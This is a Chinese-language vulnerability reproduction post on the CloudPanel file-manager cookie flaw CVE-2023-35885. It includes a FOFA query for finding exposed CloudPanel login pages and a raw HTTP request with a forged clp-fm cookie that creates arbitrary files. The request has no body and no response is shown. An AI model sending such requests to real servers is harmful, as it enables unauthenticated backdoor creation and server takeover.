CloudPanel RCE漏洞复现(CVE-2023-35885)

0x01 产品简介

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。

0x02 漏洞概述

由于2.3.1 之前的 CloudPanel 具有不安全的文件管理器 cookie 身份验证。未经身份验证的攻击者可以利用此问题在服务器上创建任意文件,创建PHP后门文件可远程代码执行,并且获取服务器权限。

0x03 影响范围

CloudPanel >= v2.0.0 && <= v2.3.0

0x04 复现环境

FOFA:title=="CloudPanel | Log In"

CloudPanel RCE漏洞复现(CVE-2023-35885)_第1张图片

0x05 漏洞复现

创建文件

POST /file-manager/backend/makefile HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0

你可能感兴趣的:(漏洞复现,web安全,安全)